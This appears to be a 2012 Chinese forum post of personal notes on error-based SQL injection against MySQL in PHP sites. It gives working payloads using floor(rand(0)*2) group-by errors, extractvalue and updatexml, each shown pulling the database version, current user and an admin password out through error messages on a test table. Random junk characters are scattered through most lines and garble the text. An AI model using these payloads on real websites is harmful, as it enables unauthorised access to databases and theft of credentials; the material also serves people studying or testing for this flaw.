放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
8 X* f0 \% T: l" Y* W* v实际测试环境:
& \' ~% _! s; @" n( t) Q% d% P4 d: {3 t' i; B' Y. c9 w
! A- p. {5 H* N2 t1 |" A+ nmysql> show tables;
5 |! u) A/ k" w% c8 v. t; B! n+----------------+
. @, [: A# }# n| Tables_in_test |% ]3 T( M/ Y! |# v+ u) G
+----------------+) O I: `( N5 u8 I- O
| admin |1 g8 Z$ a, }. m$ P
| article |; S( b5 U( O, ?& \8 s2 a
+----------------+/ E+ u6 Y- Q6 J3 n. _, v$ P( V. Q
6 t+ o* s2 D' { + \' I+ w9 I: a
5 w0 p0 L& n7 F
mysql> describe admin;
- o g0 w8 X' B* s" x+-------+------------------+------+-----+---------+----------------+6 I; }* v$ r4 A" ^& o7 O$ l
| Field | Type | Null | Key | Default | Extra |! H1 j! ]( i* K% D+ Z
+-------+------------------+------+-----+---------+----------------+
2 D6 m+ [! @) i6 C7 || id | int(10) unsigned | NO | PRI | NULL | auto_increment |! Q. O8 q! {0 G- _1 r4 l
| user | varchar(50) | NO | | NULL | |
2 C& E; m4 t2 R/ m6 b* m% Z| pass | varchar(50) | NO | | NULL | |
" O" ?2 M, ?% j3 M( @5 i5 J3 x+-------+------------------+------+-----+---------+----------------+
$ u; a+ C, {2 J5 b: b ( Q% Q5 {' L' U* n' K
4 T( N) J; A& y2 N+ r/ ? q
! _" G2 R) u5 x$ |1 g( B6 M: Zmysql> describe article;
) N8 n( [- a1 Q) `- k! K+---------+------------------+------+-----+---------+----------------+# d8 r a9 O( S# c9 C+ Z
| Field | Type | Null | Key | Default | Extra |; ~ z# _# A: R+ Q" V( ^8 Q0 Z
+---------+------------------+------+-----+---------+----------------+
: q' ~' L E/ w0 ^# p| id | int(10) unsigned | NO | PRI | NULL | auto_increment |4 X6 d k' A2 z$ y, j$ @
| title | varchar(50) | NO | | NULL | |
2 p0 V' ]& h/ u( u- j" || content | varchar(50) | NO | | NULL | |4 }! K- h% q$ m7 {8 ~
+---------+------------------+------+-----+---------+----------------+
. G& ?6 ?4 w; G1、通过floor报错
3 `5 I) t% M1 a可以通过如下一些利用代码
1 P0 h' K; F4 J4 l0 L" x
1 M. w2 A( a4 ^, S8 L, W$ n
( y! N% u- {# |1 S9 W3 Aand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
* k$ x; t4 y5 y: l/ Afrom information_schema.tables group by x)a);5 @! I" q( n- f; L u
8 i# t' b7 r( i/ {1 m! s p; b# f4 {6 I" d
% X: s+ I6 J+ p
and (select count(*) from (select 1 union select null union select !1)x0 X0 S- {" g( `5 r- x2 V% D+ V8 A2 S
group by concat((select table_name from information_schema.tables limit 1),
3 ?7 ~1 ?' W S7 D* H# ]/ O. V% _floor(rand(0)*2)));
' z9 T2 D9 w3 ~举例如下:! @1 ]5 z/ E4 A8 o( {% d& I
首先进行正常查询:( W( j- g7 x' S& P, D
Q" Y4 ]* b1 {" K' g2 b
mysql> select * from article where id = 1;: ?* k% ~9 x/ i3 X5 C$ T
+----+-------+---------+
" ^0 l& l, m9 g; [' N2 ^2 B| id | title | content |# d5 }; R4 r9 I P, _( Z7 E: X- P4 Q w
+----+-------+---------+, `1 ]% _3 ?, N" D% ~
| 1 | test | do it |6 H( w8 T# C5 P0 G3 j1 `
+----+-------+---------+
4 D; V! R4 f' {$ F' r7 F假如id输入存在注入的话,可以通过如下语句进行报错。6 n% e s) f* u7 b
2 \* [; e( k. v& ^
6 K) s4 x* t* R6 I* ~1 Q- b( G" Z
mysql> select * from article where id = 1 and (select 1 from- A, C7 s: q5 D$ ^0 e6 U3 n0 l
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
( q7 q2 g* X& H' F- Y' f% jERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
% y& h+ A( Z( }9 _可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
& L4 @4 ?5 i& m, ?5 O8 p例如我们需要查询管理员用户名和密码:
' }- ]# \ G* x4 YMethod1:/ p) z3 B% W6 m4 Z
2 C# @9 l0 G" K1 ^: `$ j( j4 k7 c ! G6 @# M: M( |
mysql> select * from article where id = 1 and (select 1 from
: o5 o4 X: v4 ~1 S3 L9 D0 J) I) O(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
9 T$ o+ M: ^0 f W8 y. K" Gfrom information_schema.tables group by x)a);
/ I1 j# H" N _, t ^# b VERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
) Y* M8 \& c" pMethod2:
7 s# G9 {5 n$ u, s % f5 Q' i( _- ~# Z
* K1 P+ o; }; u& [' ~! D9 cmysql> select * from article where id = 1 and (select count(*)
+ F+ F) a0 A6 e A" [ e! Cfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
; p; M1 n3 m0 sfloor(rand(0)*2)));
) p7 s/ e% w P4 c9 ?4 oERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
* {5 G" Q; G* g: f* F# c6 ?2、ExtractValue( M i$ x+ w a2 r& Z
测试语句如下9 {) c3 A: z. p! E; q: N
5 v3 K5 h9 [- G
$ e. Z# n3 N( Dand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));; q3 s7 g3 P- P j
实际测试过程
( p& }& \; E5 m, W/ _3 @
; U: a% |% W7 V: F8 M, f# Z% `
% Q! W# O5 @+ x4 E: T# G5 Y& D9 {mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
- a9 [' G: ~+ G% _+ }! ~5 v3 }, K# w$ e(select pass from admin limit 1)));--
) u2 w; d3 p, V1 Z/ s. O" U7 J' HERROR 1105 (HY000): XPATH syntax error: '\admin888'
' x5 y1 C- p& l" ~0 p3、UpdateXml
; W4 v) [! m: p' f6 F. ]/ E! @测试语句
a: H9 D5 K$ J1 @1 y5 K1 y
7 }& s4 D/ s6 q' J- K! W/ q + v5 `$ J4 {5 B: h( r9 G0 b8 o
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
) b8 E7 i; o% m) W1 j9 @3 m实际测试过程( m$ u2 H5 z# x' \
3 d& J. I( O5 ^2 \- d9 E2 g
. ~/ g2 E% l& n, c# Q6 o
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
) w1 |$ ?; \* h- H(select pass from admin limit 1),0x5e24),1));* U9 V+ a4 K; Y5 l k% O; n I
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
8 q) y8 o6 @0 V5 l' m1 G3 p' n" UAll, thanks foreign guys.
' r1 O& H% J) v' ^
+ S3 Z" I8 n: h6 ~; E9 b3 q3 }
|
发表于 2012-12-10 10:28:51
收藏
支持
反对